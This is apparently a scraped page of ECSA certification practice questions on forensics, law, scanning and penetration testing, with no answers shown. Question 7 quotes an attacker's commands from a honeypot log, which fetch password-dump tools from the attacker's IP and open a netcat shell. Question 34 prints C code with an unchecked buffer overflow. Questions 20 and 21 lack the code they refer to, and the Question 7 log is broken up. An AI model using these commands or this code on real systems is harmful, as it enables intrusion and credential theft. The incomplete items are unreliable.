New Year Special Sale - Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: mxmas70

Home > ECCouncil > ECSA > EC0-479

EC0-479 EC-Council Certified Security Analyst (ECSA) Question and Answers

Question # 4

With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________.

A.

0

B.

10

C.

100

D.

1

Full Access
Question # 5

What type of file is represented by a colon (:) with a name following it in the Master File Table of NTFS disk?

A.

A compressed file

B.

A Data stream file

C.

An encrypted file

D.

A reserved file

Full Access
Question # 6

You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every applicable procedure, however your boss is still concerned that the defense attorney might question weather evidence has been changed while at the laB. What can you do to prove that the evidence is the same as it was when it first entered the lab?

A.

make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab

B.

make an MD5 hash of the evidence and compare it to the standard database developed by NIST

C.

there is no reason to worry about this possible claim because state labs are certified

D.

sign a statement attesting that the evidence is the same as it was when it entered the lab

Full Access
Question # 7

The following excerpt is taken from a honeypot log that was hosted at laB. wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD. EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

“cmd1.exe /c open 213.116.251.162 >ftpcom”

“cmd1.exe /c echo johna2k >>ftpcom”

“cmd1.exe /c echo

haxedj00 >>ftpcom”

“cmd1.exe /c echo get n

C.

exe >>ftpcom”

“cmd1.exe /c echo get pdump.exe >>ftpcom”

“cmd1.exe /c echo get samdump.dll >>ftpcom”

“cmd1.exe /c echo quit >>ftpcom”

“cmd1.exe /c ftp-

s:ftpcom”

“cmd1.exe /c nc

-l -p 6969 -

e cmd1.exe”

What can you infer from the exploit given?

A.

It is a local exploit where the attacker logs in using username johna2k

B.

There are two attackers on the system -johna2k and haxedj00

C.

The attack is a remote exploit and the hacker downloads three files

D.

The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Full Access
Question # 8

When cataloging digital evidence, the primary goal is to:

A.

Make bit-stream images of all hard drives

B.

Preserve evidence integrity

C.

Not remove the evidence from the scene

D.

Not allow the computer to be turned off

Full Access
Question # 9

How many sectors will a 125 KB file use in a FAT32 file system?

A.

32

B.

16

C.

250

D.

25

Full Access
Question # 10

You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics laB. How many law-enforcement computer investigators should you request to staff the lab?

A.

8

B.

1

C.

4

D.

2

Full Access
Question # 11

The efforts to obtain information before a trail by demanding documents, depositions, questioned and answers written under oath, written requests for admissions of fact and examination of the scene is a description of what legal term?

A.

Detection

B.

Hearsay

C.

Spoliation

D.

Discovery

Full Access
Question # 12

What header field in the TCP/IP protocol stack involves the hacker exploit known as the Ping of Death?

A.

ICMP header field

B.

TCP header field

C.

IP header field

D.

UDP header field

Full Access
Question # 13

You should make at least how many bit-stream copies of a suspect drive?

A.

1

B.

2

C.

3

D.

4

Full Access
Question # 14

As a CHFI professional, which of the following is the most important to your professional reputation?

A.

Your Certifications

B.

The correct, successful management of each and every case

C.

The free that you charge

D.

The friendship of local law enforcement officers

Full Access
Question # 15

After passing her CEH exam, Carol wants to ensure that her network is completely secure. She implements a DMZ, statefull firewall, NAT, IPSEC, and a packet filtering firewall. Since all security measures were taken, none of the hosts on her network can reach the Internet. Why is that?

A.

IPSEC does not work with packet filtering firewalls

B.

NAT does not work with IPSEC

C.

NAT does not work with statefull firewalls

D.

Statefull firewalls do not work with packet filtering firewalls

Full Access
Question # 16

You are a security analyst performing reconnaissance on a company you will be carrying out a penetration test for. You conduct a search for IT jobs on Dice.com and find the following information for an open position:

7+ years experience in Windows Server environment

5+ years experience in Exchange 2000/2003 environment

Experience with Cisco Pix Firewall, Linksys 1376 router, Oracle 11i and MYOB v3.4 Accounting software are required MCSA desired,

MCSE, CEH preferred

No Unix/Linux Experience needed

What is this information posted on the job website considered?

A.

Information vulnerability

B.

Social engineering exploit

C.

Trade secret

D.

Competitive exploit

Full Access
Question # 17

Why are Linux/Unix based computers better to use than Windows computers for idle scanning?

A.

Windows computers will not respond to idle scans

B.

Linux/Unix computers are constantly talking

C.

Linux/Unix computers are easier to compromise

D.

Windows computers are constantly talking

Full Access
Question # 18

If an attacker's computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response?

A.

31401

B.

The zombie will not send a response

C.

31402

D.

31399

Full Access
Question # 19

Why is it a good idea to perform a penetration test from the inside?

A.

It is easier to hack from the inside

B.

It is never a good idea to perform a penetration test from the inside

C.

To attack a network from a hacker's perspective

D.

Because 70% of attacks are from inside the organization

Full Access
Question # 20

You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on HTML, DHTML, and other web-based languages and how they have evolved over the years. You navigate to archive.org and view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While searching through the code, you come across something abnormal:

What have you found?

A.

Trojan.downloader

B.

Blind bug

C.

Web bug

D.

CGI code

Full Access
Question # 21

What operating system would respond to the following command?

A.

Mac OS X

B.

Windows XP

C.

Windows 95

D.

FreeBSD

Full Access
Question # 22

This is original file structure database that Microsoft originally designed for floppy disks. It is written to the outermost track of a disk and contains information about each file stored on the drive.

A.

Master Boot Record (MBR)

B.

Master File Table (MFT)

C.

File Allocation Table (FAT)

D.

Disk Operating System (DOS)

Full Access
Question # 23

You have completed a forensic investigation case. You would like to destroy the data contained in various disks at the forensics lab due to sensitivity of the case. How would you permanently erase the data on the hard disk?

A.

Throw the hard disk into the fire

B.

Run the powerful magnets over the hard disk

C.

Format the hard disk multiple times using a low level disk utility

D.

Overwrite the contents of the hard disk with Junk data

Full Access
Question # 24

The police believe that Mevin Mattew has been obtaining unauthorized access to computers belonging to numerous computer software and computer operating systems manufacturers, cellular telephone manufacturers, Internet Service Providers and Educational Institutions. They also suspect that he has been stealing, copying and misappropriating proprietary computer software belonging to the several victim companies. What is preventing the police from breaking down the suspects door and searching his home and seizing all of his computer equipment if they have not yet obtained a warrant?

A.

The Fourth Amendment

B.

The USA patriot Act

C.

The Good Samaritan Laws

D.

The Federal Rules of Evidence

Full Access
Question # 25

An Expert witness give an opinion if:

A.

The Opinion, inferences or conclusions depend on special knowledge, skill or training not within the ordinary experience of lay jurors

B.

To define the issues of the case for determination by the finder of fact

C.

To stimulate discussion between the consulting expert and the expert witness

D.

To deter the witness form expanding the scope of his or her investigation beyond the requirements of the case

Full Access
Question # 26

This organization maintains a database of hash signatures for known software:

A.

International Standards Organization

B.

Institute of Electrical and Electronics Engineers

C.

National Software Reference Library

D.

American National standards Institute

Full Access
Question # 27

To preserve digital evidence, an investigator should ____________________

A.

Make tow copies of each evidence item using a single imaging tool

B.

Make a single copy of each evidence item using an approved imaging tool

C.

Make two copies of each evidence item using different imaging tools

D.

Only store the original evidence item

Full Access
Question # 28

Diskcopy is:

A.

a utility byAccessData

B.

a standard MS-DOS command

C.

Digital Intelligence utility

D.

dd copying tool

Full Access
Question # 29

As a security analyst you setup a false survey website that will require users to create a username and a strong password. You send the link to all the employees of the company. What information will you be able to gather?

A.

The employees network usernames and passwords

B.

The MAC address of the employees?computers

C.

The IP address of the employees computers

D.

Bank account numbers and the corresponding routing numbers

Full Access
Question # 30

When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?

A.

NIPS

B.

Passive IDS

C.

Progressive IDS

D.

Active IDS

Full Access
Question # 31

Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests. What type of scan is Jessica going to perform?

A.

Ping trace

B.

Tracert

C.

Smurf scan

D.

ICMP ping sweep

Full Access
Question # 32

You are trying to locate Microsoft Outlook Web Access Default Portal using Google search on the Internet. What search string will you use to locate them?

A.

outlook:"search"

B.

allinurl:"exchange/logon.asp"

C.

locate:"logon page"

D.

intitle:"exchange server"

Full Access
Question # 33

Paul's company is in the process of undergoing a complete security audit including logical and physical security testing. After all logical tests were performed; it is now time for the physical round to begin. None of the employees are made aware of this round of testing. The security-auditing firm sends in a technician dressed as an electrician. He waits outside in the lobby for some employees to get to work and follows behind them when they access the restricted areas. After entering the main office, he is able to get into the server room telling the IT manager that there is a problem with the outlets in that room. What type of attack has the technician performed?

A.

Fuzzing

B.

Tailgating

C.

Man trap attack

D.

Backtrapping

Full Access
Question # 34

Kyle is performing the final testing of an application he developed for the accounting department. His last round of testing is to ensure that the program is as secure as possible. Kyle runs the following command. What is he testing at this point?

#include

#include

int main(int argc, char *argv[])

{

char buffer[10];

if (argc < 2)

{

fprintf(stderr, "USAGE: %s string\n", argv[0]);

return 1;

}

strcpy(buffer, argv[1]);

return 0;

}

A.

Buffer overflow

B.

Format string bug

C.

Kernal injection

D.

SQL injection

Full Access